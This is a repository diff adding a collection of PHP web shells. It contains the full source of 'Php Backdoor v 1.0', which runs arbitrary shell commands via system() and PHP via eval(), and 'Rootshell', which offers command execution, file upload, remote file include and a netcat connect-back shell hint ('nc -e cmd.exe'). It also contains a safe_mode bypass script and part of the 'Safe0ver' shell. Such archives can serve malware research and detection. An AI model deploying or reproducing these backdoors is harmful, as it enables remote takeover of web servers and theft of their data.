// 检查PHP配置参数
function getphpcfg($varname) {
switch($result = get_cfg_var($varname)) {
case 0:
return No;
break;
case 1:
return Yes;
break;
default:
return $result;
break;
}
}
// 检查函数情况
function getfun($funName) {
return (false !== function_exists($funName)) ? Yes : No;
}
?>

206
web-malware-collection-13-06-2012/PHP/Php_Backdoor.txt Normal file
View file

@ -0,0 +1,206 @@
<?
// ################################
// Php Backdoor v 1.0 by ^Jerem
// ################################
// ################################
// This backdoor coded in php allows
// allows to control a web serv ...
// For use this script upload this
// on the ftp server of the hacked
// web site. Enjoy ^^
// ################################
// ################################
// Author: ^Jerem
// Mail: jerem@x-perience.org
// Web: http://www.x-perience.org
// ################################
echo '<html>';
echo '<head><title>Php Backdoor v 1.0 by ^Jerem</title></head>';
echo '<link rel="stylesheet" href="http://membres.lycos.fr/webchat/style.css" type="text/css">';
echo '<body bgcolor=black>';
echo '<font face="courier" size="2" color="#FFFFFF">';
echo '<h1>Php Backdoor v 1.0 by ^Jerem</h1><br><br>';
echo '<center><img src="http://img418.imageshack.us/img418/3218/jerem9sn.png" alt="Owned by ^Jerem"></center>';
echo '<br><br>';
echo 'Backdoor option list:<br><br>';
echo '• <a href="?action=index">Backdoor index</a><br><br>';
echo '• <a href="?action=shell">Execute a shell code</a><br>';
echo '• <a href="?action=php">Execute a php code</a><br>';
echo '• <a href="?action=files">Files Management</a><br>';
echo '• <a href="?action=up">Upload a file</a><br>';
echo '• <a href="?action=listing">Files listing</a><br>';
echo '• <a href="?action=mail">Send a Email</a><br>';
echo '• <a href="?action=infos">Infos serv</a>';
if ($action == "shell") {
echo '<br><br>#########################<br><br>';
echo 'Enter shell code to execute: ';
echo '<form method="POST" action="?action=shellgo">';
//echo '<input type="text" name="cmd" size="50" value="ls -a"> ';
echo '<textarea name="cmd" cols="50" rows="10"></textarea><br>';
echo '<input type="submit" value="Execute"></form>';
} elseif ($action == "shellgo") {
echo '<br><br>#########################<br><br>';
$cmd = stripslashes($cmd);
echo 'The shell code <b>'.$cmd.'</b> as been executed on server.<br>';
echo 'The server with answered this your request:<br><br>';
system($cmd);
} else if ($action == "mail") {
echo '<br><br>#########################<br><br>';
echo '<form method="POST" action="?action=mailgo">';
echo 'Enter the expeditor Email: ';
echo '<input type="text" name="exp" size="30" value="you@ownz.com"><br>';
echo 'Enter the receptor Email: ';
echo '<input type="text" name="recpt" size="30" value="fucker@small-dick.com"><br>';
echo 'Enter the topic of your Email: ';
echo '<input type="text" name="topic" size="30" value="Have a nice day looser :D"><br><br>';
echo 'Enter the Email content:<br>';
echo '<textarea name="content" cols="50" rows="10"></textarea><br><br>';
echo '<input type="submit" value="Send Email"></form>';
} else if ($action == "mailgo") {
echo '<br><br>#########################<br><br>';
echo 'Your Email have been sended to <b>'.$recpt.'</b>.<br>';
$hd = 'From:'.$exp.' \r\nReply-To:'.$exp.'';
mail($recpt,$topic,$content,$hd);
} else if ($action == "up") {
echo '<br><br>#########################<br><br>';
echo '<form method="POST" enctype="multipart/form-data" action="?action=upgo">';
echo 'Select a file to upload: ';
echo '<input type="file" name="file" size="30"><br> ';
echo 'Enter the name of file in the server: ';
echo '<input type="text" name="fts" size="30" value="your-file.txt"> ';
echo '<input type="submit" value="Upload this file"></form>';
} else if ($action == "upgo") {
echo '<br><br>#########################<br><br>';
copy($file, $fts);
echo 'Your file was succelify uploaded on server.';
} else if ($action == "listing") {
echo '<br><br>#########################<br><br>';
echo 'Files listing of <b>/</b><br><br>';
} else if ($action == "infos") {
echo '<br><br>#########################<br><br>';
echo 'Server informations<br><br>';
echo 'Backdoor file:<b> '.$SCRIPT_NAME.'</b><br>';
echo 'Backdoor URL:<b> '.$SCRIPT_FILENAME.'</b><br>';
echo 'OS & PhpVersion:<b> '.$SERVER_SOFTWARE.'</b><br>';
echo 'Admin Email:<b> '.$SERVER_ADMIN.'</b><br>';
echo 'Server name:<b> '.$SERVER_NAME.'</b><br>';
echo 'Server cookie:<b> <script>document.write(document.cookie)</script></b><br>';
echo 'Server ip:<b> '.$SERVER_ADDR.'</b> (Running on port<b> '.$SERVER_PORT.'</b>)<br>';
echo 'CGI Version:<b> '.$GATEWAY_INTERFACE.'</b><br>';
echo 'Request Method:<b> '.$REQUEST_METHOD.'</b><br>';
echo 'HTTP Protocol Version:<b> '.$SERVER_PROTOCOL.'</b><br>';
echo 'HTTP Heading Accept:<b> '.$HTTP_ACCEPT.'</b><br>';
echo 'HTTP User Agent:<b> '.$HTTP_USER_AGENT.'</b><br>';
echo 'HTTP Accept Charset:<b> '.$HTTP_ACCEPT_CHARSET.'</b><br>';
echo 'HTTP Accept Encodingt:<b> '.$HTTP_ACCEPT_ENCODING.'</b><br>';
echo 'HTTP Accept Language:<b> '.$HTTP_ACCEPT_LANGUAGE.'</b><br>';
echo 'HTTP Heading Connection Protocol:<b> '.$HTTP_CONNECTION.'</b><br>';
echo 'HTTP Heading Host Protocol:<b> '.$HTTP_HOST.'</b>';
echo '<br><br>#########################<br><br>';
echo 'Phpinfo();<br><br>';
echo '<iframe src="?action=phpinfo" height="400" width="800"></iframe>';
} else if ($action == "phpinfo") {
phpinfo();
} else if ($action == "php") {
echo '<br><br>#########################<br><br>';
echo 'Enter php code to execute:<br><br>';
echo '<form method="POST" action="?action=phpgo">';
echo '<textarea name="cmd" cols="50" rows="10"></textarea><br>';
echo '<input type="submit" value="Execute"></form>';
} else if ($action == "phpgo") {
echo '<br><br>#########################<br><br>';
$cmd = stripslashes($cmd);
echo 'The php code <b>'.$cmd.'</b> as been executed.<br>';
echo 'The server with answered this your request:<br><br>';
eval($cmd);
} else if ($action == "files") {
echo '<br><br>#########################<br><br>';
echo 'Create a new file:<br><br>';
echo '<form method="POST" action="?action=filenew">';
echo 'File name: <input type="text" name="nfile" size="30" value="you-file.txt"> ';
echo '<input type="submit" value="Create"></form>';
echo '<br><br>#########################<br><br>';
echo 'Delete a file:<br><br>';
echo '<form method="POST" action="?action=filedel">';
echo 'File name: <input type="text" name="nfile" size="30" value="you-file.txt"> ';
echo '<input type="submit" value="Delete"></form>';
echo '<br><br>#########################<br><br>';
echo 'Modify a file:<br><br>';
echo '<form method="POST" action="?action=filemod">';
echo 'File name: <input type="text" name="nfile" size="30" value="you-file.txt"> ';
echo '<input type="submit" value="Modify"></form>';
echo '<br><br>#########################<br><br>';
echo 'Read a file:<br><br>';
echo '<form method="POST" action="?action=fileread">';
echo 'File name: <input type="text" name="nfile" size="30" value="you-file.txt"> ';
echo '<input type="submit" value="Read"></form>';
echo '<br><br>#########################<br><br>';
echo 'Rename a file:<br><br>';
echo '<form method="POST" action="?action=filename">';
echo 'File name: <input type="text" name="nfile" size="30" value="you-file.txt"><br> ';
echo 'New name: <input type="text" name="newfile" size="30" value="you-new-file.txt"> ';
echo '<input type="submit" value="Rename"></form>';
} else if ($action == "filenew") {
echo '<br><br>#########################<br><br>';
echo 'Your file <b> '.$nfile.' </b> was created susellify<br><br>';
$index=fopen($nfile,'a');
fwrite($index,'');
fclose($index);
} else if ($action == "filedel") {
echo '<br><br>#########################<br><br>';
echo 'Your file <b> '.$nfile.' </b> was deleted susellify<br><br>';
unlink($nfile);
} else if ($action == "filemod") {
echo '<br><br>#########################<br><br>';
echo 'Modifing <b> '.$nfile.' </b>:<br><br>';
echo '<form method="POST" action="?action=filemodgo&nfile='.$nfile.'">';
$index = fopen($nfile, "r");
$ct = fread($index, filesize($nfile));
$ct = htmlentities ($ct, ENT_QUOTES);
$ct = nl2br($ct);
echo '<textarea name="newctt" cols="50" rows="10">'.$ct.'</textarea><br>';
echo '<input type="submit" value="Save modification"></form>';
} else if ($action == "filemodgo") {
echo '<br><br>#########################<br><br>';
echo 'You files <b> '.$nfile.' </b> as modified sucellify<br><br>';
$index = fopen($nfile, "w");
fwrite($index, stripslashes($newctt));
} else if ($action == "fileread") {
echo '<br><br>#########################<br><br>';
echo 'Reading <b> '.$nfile.' </b> ...<br><br>';
$index = fopen($nfile, "r");
$ct = fread($index, filesize($nfile));
$ct = htmlentities ($ct, ENT_QUOTES);
$ct = nl2br($ct);
echo $ct;
} else if ($action == "filename") {
copy($nfile, $newfile);
unlink($nfile);
}
else {
echo '<br><br>################################<br><br>';
echo 'Php Backdoor v 1.0 by ^Jerem<br><br>';
echo '################################<br><br>';
echo 'This backdoor coded in php allows<br>';
echo 'allows to control a web serv ...<br>';
echo 'For use this script upload this<br>';
echo 'on the ftp server of the hacked<br>';
echo 'web site. Enjoy ^^<br><br>';
echo '################################<br><br>';
echo 'Author: ^Jerem<br>';
echo 'Mail: jerem@x-perience.org<br>';
echo 'Web: http://www.x-perience.org<br>';
}
echo '</font></body>';
echo '</html>';
?>

1456
web-malware-collection-13-06-2012/PHP/Private-i3lue.php Normal file
View file

File diff suppressed because it is too large Load diff

1456
web-malware-collection-13-06-2012/PHP/Private-i3lue.txt Normal file
View file

File diff suppressed because it is too large Load diff

2652
web-malware-collection-13-06-2012/PHP/RedhatC99 [login=redhat-pass=root] Normal file
View file

File diff suppressed because it is too large Load diff

246
web-malware-collection-13-06-2012/PHP/Rootshell.v.1.0.txt Normal file
View file

@ -0,0 +1,246 @@
<!--
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* ................jdWMMMMMNk&,...JjdMMMHMMHA+................ */
/* .^.^.^.^.^.^..JdMMMBC:vHMMNI..`dMMM8C`ZMMMNs...^^.^^.^^.^^. */
/* ..^.^..^.....dMMMBC`....dHNn...dMNI....`vMMMNy.........^... */
/* .....^..?XMMMMMBC!..dMM@MMMMMMM#MMH@MNZ,^!OMMHMMNk!..^...^. */
/* ^^.^..^.`??????!`JdN0??!??1OUUVT??????XQy!`??????!`..^..^.^ */
/* ..^..^.....^..^..?WN0`` ` +llz:` .dHR:..^.......^..^... */
/* ...^..^.^.^..^...`?UXQQQQQeyltOOagQQQeZVz`..^.^^..^..^..^.. */
/* ^.^..^..^..^..^.^..`zWMMMMH0llOXHMMMM9C`..^.....^..^..^..^. */
/* ..^..^...^..+....^...`zHHWAwtltwAXH8I....^...?+....^...^..^ */
/* ...^..^...JdMk&...^.^..^zHNkAAwWMHc...^.....jWNk+....^..^.. */
/* ^.^..^..JdMMMMNHo....^..jHMMMMMMMHl.^..^..jWMMMMNk+...^..^. */
/* .^....jdNMM9+4MMNmo...?+zZV7???1wZO+.^..ddMMM6?WMMNmc..^..^ */
/* ^.^.jqNMM9C!^??UMMNmmmkOltOz+++zltlOzjQQNMMY?!`??WMNNmc^.^. */
/* ummQHMM9C!.uQo.??WMMMMNNQQkI!!?wqQQQQHMMMYC!.umx.?7WMNHmmmo */
/* OUUUUU6:.jgWNNmx,`OUWHHHHHSI..?wWHHHHHW9C!.udMNHAx.?XUUUU9C */
/* .......+dWMMMMMNm+,`+ltltlzz??+1lltltv+^.jdMMMMMMHA+......^ */
/* ..^..JdMMMMC`vMMMNkJuAAAAAy+...+uAAAAA&JdMMMBC`dMMMHs....^. */
/* ....dMMMMC``.``zHMMMMMMMMMMS==zXMMMMMMMMMM8v``.`?ZMMMNs.... */
/* dMMMMMBC!`.....`!?????1OVVCz^^`+OVVC??????!`....^`?vMMMMMNk */
/* ??????!`....^.........?ztlOz+++zlltz!........^.....???????! */
/* .....^.^^.^..^.^^...uQQHkwz+!!!+zwWHmmo...^.^.^^.^..^....^. */
/* ^^.^.....^.^..^...ugHMMMNkz1++++zXMMMMHmx..^....^.^..^.^..^ */
/* ..^.^.^.....^...jdHMMMMM9C???????wWMMMMMHn+...^....^..^..^. */
/* ^....^.^.^....JdMMMMMMHIz+.......?zdHMMMMMNA....^..^...^..^ */
/* .^.^....^...JdMMMMMMHZttOz1111111zlttwWMMMMMNn..^.^..^..^.. */
/* ..^.^.^....dNMMMMMWOOtllz!^^^^^^^+1lttOZWMMMMMNA,....^..^.. */
/* ^....^..?dNMMMMMC?1ltllllzzzzzzzzzlllltlz?XMMMMNNk+^..^..^. */
/* .^.^..+dNMM8T77?!`+lllz!!!!!!!!!!!!+1tll+`??777HMNHm;..^..^ */
/* ..^..^jHMMNS`..^.`+ltlz+++++++++++++ztll+`....`dMMMHl.^..^. */
/* ....^.jHMMNS`^...`+ltlz+++++++++++++zltl+`^.^.`dMMMHl..^..^ */
/* ^^.^..jHMMNS`.^.^`+tllz+...........?+ltl+`.^..`dMMMHl...^.. */
/* ..^..^jHMMM6`..^.`+lltltltlz111zltlltlll+`...^`dMMMHl.^..^. */
/* ....^.jHNC``.^...`+zltlltlz+^^.+zltlltzz+`..^.^`?dMHl..^..^ */
/* .^.^..jHNI....^..^``+zltltlzzzzzltltlv!``.^...^..dMHc....^. */
/* ^...jdNMMNmo...^...^`?+ztlltllltlltz!``..^.^...dqNMMNmc.^.. */
/* .^.`?7TTTTC!`..^.....^`?!!!!!!!!!!!!`..^....^.`?7TTTTC!..^. */
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/*
/* We should take care some kind of history, i will add here to keep a trace of changes (who made it).
/* Also I think we should increase the last version number by 1 if you make some changes.
/*
/* CHANGES / VERSION HISTORY:
/* ====================================================================================
/* Version Nick Description
/* - - - - - - - - - - - - - - - - - - - - - - - - - - -
/* 0.3.1 666 added an ascii bug :)
/* 0.3.1 666 password protection
/* 0.3.1 666 GET and POST changes
/* 0.3.2 666 coded a new uploader
/* 0.3.2 666 new password protection
/* 0.3.3 666 added a lot of comments :)
/* 0.3.3 666 added "Server Info"
/* 1.0.0 666 added "File Inclusion"
/* 1.0.0 666 removed password protection (nobody needs it...)
/* 1.0.0 666 added "Files & Directories"
/*
/*
-->
<?
//
// Default Changes
// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
$owner = "Hacker"; // Insert your nick
$version = "1.0.0"; // The version
// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
//
?>
<body link="#000000" vlink="#000000" alink="#000000" bgcolor="#FFFFD5">
<style type="text/css">
body{
cursor:crosshair
}
</style>
<div align="center" style="width: 100%; height: 100">
<pre width="100%" align="center"><strong> ____ _ ____ _ _ _
| _ \ ___ ___ | |_ / ___|| |__ ___| | |
| |_) / _ \ / _ \| __| \___ \| '_ \ / _ \ | |
| _ < (_) | (_) | |_ _ ___) | | | | __/ | |
|_| \_\___/ \___/ \__| (_) |____/|_| |_|\___|_|_|</pre>
</div></strong>
<b><u><center><?php echo "This server has been infected by $owner"; ?></center></u></b>
<hr color="#000000" size="2,5">
<div align="center">
<center>
<p>
<?php
// Check for safe mode
if( ini_get('safe_mode') ) {
print '<font color=#FF0000><b>Safe Mode ON</b></font>';
} else {
print '<font color=#008000><b>Safe Mode OFF</b></font>';
}
?>
&nbsp;</p><font face="Webdings" size="6">!</font><br>
&nbsp;<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="25" bordercolor="#000000">
<tr>
<td width="1%" height="25" bgcolor="#FCFEBA">
<p align="center"><font face="Verdana" size="2">[ Server Info ]</font></td>
</tr>
<tr>
<td width="49%" height="142">
<p align="center">
<font face="Verdana" style="font-size: 8pt"><b>Current Directory:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
<br />
<b>Shell:</b> <? echo $SCRIPT_FILENAME ?>
<br>
<b>Server Software:</b> <? echo $SERVER_SOFTWARE ?><br>
<b>Server Name:</b> <? echo $SERVER_NAME ?><br>
<b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?><br>
</font></tr>
</table><br />
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="426" bordercolor="#000000">
<tr>
<td width="49%" height="25" bgcolor="#FCFEBA" valign="middle">
<p align="center"><font face="Verdana" size="2">[ Command Execute ]</font></td>
<td width="51%" height="26" bgcolor="#FCFEBA" valign="middle">
<p align="center"><font face="Verdana" size="2">[ File Upload ]</font></td>
</tr>
<tr>
<td width="49%" height="142">
<p align="center"><form method="post">
<p align="center">
<br>
<font face="Verdana" style="font-size: 8pt">Insert your commands here:</font><br>
<br>
<textarea size="70" name="command" rows="2" cols="40" ></textarea> <br>
<br><input type="submit" value="Execute!"><br>
&nbsp;<br></p>
</form>
<p align="center">
<textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea><br>
<br>
<font face="Verdana" style="font-size: 8pt"><b>Info:</b> For a connect
back Shell, use: <i>nc -e cmd.exe [SERVER] 3333<br>
</i>after local command: <i>nc -v -l -p 3333 </i>(Windows)</font><br /><br /> <td><p align="center"><br>
<form enctype="multipart/form-data" method="post">
<p align="center"><br>
<br>
<font face="Verdana" style="font-size: 8pt">Here you can upload some files.</font><br>
<br>
<input type="file" name="file" size="20"><br>
<br>
<font style="font-size: 5pt">&nbsp;</font><br>
<input type="submit" value="Upload File!"> <br>
&nbsp;</p>
</form>
<?php
function check_file()
{
global $file_name, $filename;
$backupstring = "copy_of_";
$filename = $backupstring."$filename";
if( file_exists($filename))
{
check_file();
}
}
if(!empty($file))
{
$filename = $file_name;
if( file_exists($file_name))
{
check_file();
echo "<p align=center>File already exist</p>";
}
else
{
copy($file,"$filename");
if( file_exists($filename))
{
echo "<p align=center>File uploaded successful</p>";
}
elseif(! file_exists($filename))
{
echo "<p align=center>File not found</p>";
}
}
}
?>
<font face="Verdana" style="font-size: 8pt">
<p align=\"center\"></font>
</td>
</tr>
<tr>
<td width="49%" height="25" bgcolor="#FCFEBA">
<p align="center"><font face="Verdana" size="2">[ Files & Directories ]</font></td>
<td width="51%" height="19" bgcolor="#FCFEBA">
<p align="center"><font face="Verdana" size="2">[ File Inclusion ]</font></td>
</tr>
<tr>
<td width="49%" height="231">
<form method="post">
<p align="center">
<font face="Verdana" style="font-size: 11pt">
<?
$folder=opendir('./');
while ($file = readdir($folder)) {
if($file != "." && $file != "..")
echo '<a target="_blank" href="'.$file.'">'.$file.'</a ><br>';
}
closedir($folder);
?></p>
</form>
<p align="center">
<br>
&nbsp;<p align="center">&nbsp;</td>
<td width="51%" height="232">
<p align="center"><font face="Verdana" style="font-size: 8pt"><br>
Include
something :)<br>
<br>
&nbsp;</font><form method="POST">
<p align="center">
<input type="text" name="incl" size="20"><br>
<br>
<input type="submit" value="Include!" name="inc"></p>
</form>
<?php @$output = include($_POST['incl']); ?>
</td>
</tr>
</table>
</center>
</div>
<br /></p>
<div align="center">
<center>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2">
<tr>
<td width="100%" bgcolor="#FCFEBA" height="20">
<p align="center"><font face="Verdana" size="2">Rootshell v<?php echo "$version" ?> 2006 by <a style="text-decoration: none" target="_blank" href="http://www.SR-Crew.de.tt">SR-Crew</a> </font></td>
</tr>
</table>
</center>
</div>

94
web-malware-collection-13-06-2012/PHP/Safe mode breaker.php Normal file
View file

@ -0,0 +1,94 @@
<?
// Safe mode breaker. eXpl0id by KPbIC [myiworm@mail.ru]
// data: 28.01.2006
error_reporting(E_WARNING);
ini_set("display_errors", 1);
echo "<head><title>".getcwd()."</title></head>";
echo "<form method=POST>";
echo "<div style='float: left'>Root directory: <input type=text name=root value='{$_POST['root']}'></div>";
echo "<input type=submit value='--&raquo;'></form>";
echo "<HR>";
// break fucking safe-mode !
$root = "/";
if($_POST['root']) $root = $_POST['root'];
if (!ini_get('safe_mode')) die("Safe-mode is OFF.");
$c = 0; $D = array();
set_error_handler("eh");
$chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
for($i=0; $i < strlen($chars); $i++){
$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
$prevD = $D[count($D)-1];
glob($path."*");
if($D[count($D)-1] != $prevD){
for($j=0; $j < strlen($chars); $j++){
$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
$prevD2 = $D[count($D)-1];
glob($path."*");
if($D[count($D)-1] != $prevD2){
for($p=0; $p < strlen($chars); $p++){
$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
$prevD3 = $D[count($D)-1];
glob($path."*");
if($D[count($D)-1] != $prevD3){
for($r=0; $r < strlen($chars); $r++){
$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
glob($path."*");
}
}
}
}
}
}
}
$D = array_unique($D);
echo "<xmp>";
foreach($D as $item) echo "{$item}\n";
echo "</xmp>";
function eh($errno, $errstr, $errfile, $errline){
global $D, $c, $i;
preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
if($o){ $D[$c] = $o[2]; $c++;}
}
?>

950
web-malware-collection-13-06-2012/PHP/Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt Normal file
View file

@ -0,0 +1,950 @@
<?php
/*
*****************************************************************************************
* Safe0ver Shell //Safe Mod Bypass By Evilc0der *
*****************************************************************************************
* Evilc0der.org is a Platform Which You can Publish Your Shell Script *
*****************************************************************************************
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!! Dikkat ! Script Egitim Amacli Yazilmistir.Scripti Kullanarak Yapacaginiz Illegal eylemlerden sorumlu Degiliz.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
*/
/*Setting some envirionment variables...*/
/* I added this to ensure the script will run correctly...
Please enter the Script's filename in this variable. */
$SFileName=$PHP_SELF;
/* uncomment the two following variables if you want to use http
authentication. This will password protect your PHPShell */
//$http_auth_user = "phpshell"; /* HTTP Authorisation username, uncomment if you want to use this */
//$http_auth_pass = "phpshell"; /* HTTP Authorisation password, uncomment if you want to use this */
error_reporting(0);
$PHPVer=phpversion();
$isGoodver=(intval($PHPVer[0])>=4);
$scriptTitle = "Safe0ver";
$scriptident = "$scriptTitle By Evilc0der.org";
$urlAdd = "";
$formAdd = "";
function walkArray($array){
while (list($key, $data) = each($array))
if (is_array($data)) { walkArray($data); }
else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";}
}
if (isset($_PUT)) walkArray($_PUT);
if (isset($_GET)) walkArray($_GET);
if (isset($_POST)) walkArray($_POST);
$pos = strpos($urlAdd, "s=r");
if (strval($pos) != "") {
$urlAdd= substr($urlAdd, 0, $pos);
}
$urlAdd .= "&s=r&";
if (empty($Pmax))
$Pmax = 125; /* Identifies the max amount of Directories and files listed on one page */
if (empty($Pidx))
$Pidx = 0;
$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
$scriptdate = "7 Subat 2007";
$scriptver = "Bet@ Versiyon";
$LOCAL_IMAGE_DIR = "img";
$REMOTE_IMAGE_URL = "img";
$img = array(
"Edit" => "edit.gif",
"Download" => "download.gif",
"Upload" => "upload.gif",
"Delete" => "delete.gif",
"View" => "view.gif",
"Rename" => "rename.gif",
"Move" => "move.gif",
"Copy" => "copy.gif",
"Execute" => "exec.gif"
);
while (list($id, $im)=each($img))
if (file_exists("$LOCAL_IMAGE_DIR/$im"))
$img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
else
$img[$id] = "[$id]";
/* HTTP AUTHENTICATION */
if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass) || (($logoff==1) && $noauth=="yes") ) {
setcookie("noauth","");
Header( "WWW-authenticate: Basic realm=\"$scriptTitle $scriptver\"");
Header( "HTTP/1.0 401 Unauthorized");
echo "Your username or password is incorrect";
exit ;
}
function buildUrl($display, $url) {
global $urlAdd;
$url = $SFileName . "?$urlAdd$url";
return "<a href=\"$url\">$display</a>";
}
function sp($mp) {
for ( $i = 0; $i < $mp; $i++ )
$ret .= "&nbsp;";
return $ret;
}
function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr); }
function Mydeldir($Fdir) {
if (is_dir($Fdir)) {
$Fh=@opendir($Fdir);
while ($Fbuf = readdir($Fh))
if (($Fbuf != ".") && ($Fbuf != ".."))
Mydeldir("$Fdir/$Fbuf");
@closedir($Fh);
return rmdir($Fdir);
} else {
return unlink($Fdir);
}
}
function arrval ($array) {
list($key, $data) = $array;
return $data;
}
function formatsize($insize) {
$size = $insize;
$add = "B";
if ($size > 1024) {
$size = intval(intval($size) / 1.024)/1000;
$add = "KB";
}
if ($size > 1024) {
$size = intval(intval($size) / 1.024)/1000;
$add = "MB";
}
if ($size > 1024) {
$size = intval(intval($size) / 1.024)/1000;
$add = "GB";
}
if ($size > 1024) {
$size = intval(intval($size) / 1.024)/1000;
$add = "TB";
}
return "$size $add";
}
if ($cmd != "downl") {
?>
<!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?> -->
<HTML>
<HEAD>
<STYLE>
<!--
A{ text-decoration:none; color:navy; font-size: 12px }
body {
font-size: 12px;
font-family: arial, helvetica;
scrollbar-width: 5;
scrollbar-height: 5;
scrollbar-face-color: white;
scrollbar-shadow-color: silver;
scrollbar-highlight-color: white;
scrollbar-3dlight-color:silver;
scrollbar-darkshadow-color: silver;
scrollbar-track-color: white;
scrollbar-arrow-color: black;
background-color: #CCCCCC;
}
Table { font-size: 12px; }
TR{ font-size: 12px; }
TD{
font-size: 12px;
font-family: arial, helvetical;
BORDER-LEFT: black 0px solid;
BORDER-RIGHT: black 0px solid;
BORDER-TOP: black 0px solid;
BORDER-BOTTOM: black 0px solid;
COLOR: black;
background: #CCCCCC;
}
.border{ BORDER-LEFT: black 1px solid;
BORDER-RIGHT: black 1px solid;
BORDER-TOP: black 1px solid;
BORDER-BOTTOM: black 1px solid;
}
.none { BORDER-LEFT: black 0px solid;
BORDER-RIGHT: black 0px solid;
BORDER-TOP: black 0px solid;
BORDER-BOTTOM: black 0px solid;
}
.inputtext {
background-color: #EFEFEF;
font-family: arial, helvetica;
border: 1px solid #000000;
height: 20;
}
.lighttd { background: #F8F8F8;
}
.darktd { background: #CCCCCC;
}
input { font-family: arial, helvetica;
}
.inputbutton {
background-color: #CCCCCC;
border: 1px solid #000000;
border-width: 1px;
height: 20;
}
.inputtextarea {
background-color: #CCCCCC;
border: 1px solid #000000;
scrollbar-width: 5;
scrollbar-height: 5;
scrollbar-face-color: #EFEFEF;
scrollbar-shadow-color: silver;
scrollbar-highlight-color: #EFEFEF;
scrollbar-3dlight-color:silver;
scrollbar-darkshadow-color: silver;
scrollbar-track-color: #EFEFEF;
scrollbar-arrow-color: black;
}
.top { BORDER-TOP: black 1px solid; }
.textin { BORDER-LEFT: silver 1px solid;
BORDER-RIGHT: silver 1px solid;
BORDER-TOP: silver 1px solid;
BORDER-BOTTOM: silver 1px solid;
width: 99%; font-size: 12px; font-weight: bold; color: Black;
}
.notop { BORDER-TOP: black 0px solid; }
.bottom { BORDER-BOTTOM: black 1px solid; }
.nobottom { BORDER-BOTTOM: black 0px solid; }
.left { BORDER-LEFT: black 1px solid; }
.noleft { BORDER-LEFT: black 0px solid; }
.right { BORDER-RIGHT: black 1px solid; }
.noright { BORDER-RIGHT: black 0px solid; }
.silver{ BACKGROUND: #CCCCCC; }
body,td,th {
color: #660000;
}
a:link {
color: #000000;
text-decoration: none;
}
a:hover {
color: #00FF00;
text-decoration: none;
}
a:active {
color: #666666;
text-decoration: none;
}
a:visited {
text-decoration: none;
}
.style5 {
color: #660000;
font-weight: bold;
}
-->
</STYLE>
<TITLE><?php echo $SFileName ?></TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></HEAD>
<body topmargin="0" leftmargin="0">
<div style="position: absolute; background: #CCCCCC; z-order:10000; top:0; left:0; width: 100%; height: 100%;">
<table nowrap width=100% border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" class="silver border"><center>
<strong> <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font> </strong>
</center></td>
</tr>
</table>
<table width=100% height="100%" NOWRAP border="0">
<tr NOWRAP>
<td width="100%" NOWRAP><br>
<?php
}
if ( $cmd=="dir" ) {
$h=@opendir($dir);
if ($h == false) {
echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
Klasör Listelenemiyor!Lütfen Bypass Bölümünü Deneyin.<br>".sp(3)."\n
Script Gecisi Tamamlayamadi!
<br><br>".sp(3)."\n
Klasöre Girmek Icin yetkiniz Olduguna emin Olunuz...
<br><br></font>\n\n\n\n";
}
if (function_exists('realpath')) {
$partdir = realpath($dir);
}
else {
$partdir = $dir;
}
if (strlen($partdir) >= 100) {
$partdir = substr($partdir, -100);
$pos = strpos($partdir, "/");
if (strval($pos) != "") {
$partdir = "<-- ...".substr($partdir, $pos);
}
$partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
}
?>
